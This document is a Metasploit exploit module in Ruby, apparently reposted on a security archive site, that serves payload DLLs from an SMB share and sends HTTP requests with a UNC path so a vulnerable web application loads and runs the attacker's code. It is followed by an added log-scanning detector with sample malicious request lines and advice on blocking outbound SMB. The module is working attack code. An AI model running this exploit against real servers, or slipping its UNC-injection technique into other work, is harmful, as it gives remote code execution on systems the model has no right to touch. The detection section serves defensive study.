Generic Web Application DLL Injection
Source: metasploit.com  Author: Hall  Published: 2015-03-05
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::SMB::Server::Share
  include Msf::Exploit::EXE

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Generic Web Application DLL Injection',
      'Description'    => %q{
        This is a general-purpose module for exploiting conditions where an HTTP request
        triggers a DLL load from a specified SMB share. This module serves payloads as
        DLLs over an SMB service and allows an arbitrary HTTP URL to be called that would
        trigger the load of the DLL.
      },
      'Author'         =>
        [
          'Matthew Hall <hallm[at]sec-1.com>'
        ],
      'Platform'       => 'win',
      'Privileged'     => false,
      'Arch'           => [ARCH_X86, ARCH_X86_64],
      'Stance'         => Msf::Exploit::Stance::Aggressive,
      'Payload'        =>
        {
          'Space'       => 2048,
          'DisableNops' => true
        },
      'References'     =>
        [
          ['CWE', '427']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Targets'        =>
        [
          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
          [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
        ],
      'DefaultTarget'  => 0, # Default target is 32-bit as we usually inject into 32bit processes
      'DisclosureDate' => 'Mar 04 2015'
      ))

    register_options(
      [
        OptString.new('FILE_NAME', [false, 'DLL File name to share (Default: random .dll)']),
        OptString.new('TARGETURI', [true,  'Path to vulnerable URI (The shared location will be added at the end)', '/cgi-bin/function.php?argument=' ]),
        OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 10])
      ], self.class)

    deregister_options('FILE_CONTENTS')
  end

  def setup
    super

    self.file_contents = generate_payload_dll
    self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(4 + rand(3))}.dll"
    print_status("File available on #{unc}...")
  end

  def primer
    sploit = target_uri.to_s
    sploit << unc

    print_status("#{peer} - Trying to ")
    send_request_raw({
      'method' => 'GET',
      'uri' => sploit
    }, 3)
  end

  def exploit
    begin
      Timeout.timeout(datastore['SMB_DELAY']) {super}
    rescue Timeout::Error
      # do nothing... just finish exploit and stop smb server...
    end
  end
end
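The request this module sends is simply the target URI with a UNC path (`\\host\share\name.dll`) appended, so on the server side the only trace is a query parameter whose value is a UNC path, often URL-encoded. The following detector is an added example written for this page; it is not part of the module or of the Metasploit project. It parses combined-format access-log lines (the sample lines are constructed, not real traffic), decodes each query value (including double encoding) and flags values that look like a UNC path in either the backslash or forward-slash form.

```ruby
require 'uri'

# Constructed sample access-log lines in Apache/nginx combined format (not real traffic).
# Line 1: URL-encoded UNC path, line 2: raw UNC path, line 3: benign, line 4: forward-slash UNC form.
SAMPLE_LOG = <<~'LOG'
  10.0.0.5 - - [04/Mar/2015:10:12:01 +0000] "GET /cgi-bin/function.php?argument=%5C%5C10.0.0.9%5Cshare%5Cabcd.dll HTTP/1.1" 200 512 "-" "Mozilla/5.0"
  10.0.0.6 - - [04/Mar/2015:10:12:02 +0000] "GET /cgi-bin/function.php?argument=\\10.0.0.9\share\lib.dll HTTP/1.1" 200 512 "-" "curl/7.40"
  10.0.0.7 - - [04/Mar/2015:10:12:03 +0000] "GET /index.php?page=about HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
  10.0.0.8 - - [04/Mar/2015:10:12:04 +0000] "GET /cgi-bin/function.php?argument=//10.0.0.9/share/x.dll HTTP/1.1" 200 512 "-" "Mozilla/5.0"
LOG

# Request line inside the quoted part of a combined-format log entry.
REQUEST_RE = /"(?<method>[A-Z]+) (?<target>\S+) HTTP\/[\d.]+"/

# A UNC-looking value: \\host\share... or //host/share..., host and share non-empty.
UNC_RE = %r{\A(\\\\|//)[^\\/\s]+[\\/][^\\/\s]+}

# Percent-decode a query value, repeating a bounded number of times so that
# double-encoded input (%255C -> %5C -> \) is still caught.
def decode(value)
  3.times do
    decoded = URI.decode_www_form_component(value) rescue value
    break if decoded == value
    value = decoded
  end
  value
end

# Return [name, decoded_value] pairs of query parameters whose value is a UNC path.
def suspicious_params(target)
  _path, query = target.split('?', 2)
  return [] unless query
  query.split('&').each_with_object([]) do |pair, hits|
    name, raw = pair.split('=', 2)
    value = decode(raw.to_s)
    hits << [name, value] if value.match?(UNC_RE)
  end
end

# Scan a block of log text; return one hit per suspicious parameter with the
# line number, client address, parameter name and decoded value.
def scan_log(text)
  text.each_line.with_index(1).each_with_object([]) do |(line, n), hits|
    m = REQUEST_RE.match(line) or next
    suspicious_params(m[:target]).each do |name, value|
      hits << { line: n, client: line.split(' ', 2).first, param: name, value: value }
    end
  end
end

if __FILE__ == $PROGRAM_NAME
  scan_log(SAMPLE_LOG).each do |h|
    puts "line #{h[:line]}: #{h[:client]} param=#{h[:param]} value=#{h[:value]}"
  end
end
```

The forward-slash form is included because some Windows APIs accept `//host/share` as a UNC path, but that form also matches protocol-relative URLs in redirect-style parameters, so in production you would combine this check with an allowlist of parameters that may legitimately carry URLs or with a requirement that the value ends in `.dll`. Outbound SMB (TCP 445) from a web server to an address it has no business contacting is the matching network-side signal; blocking that egress removes the load path this module depends on.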

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved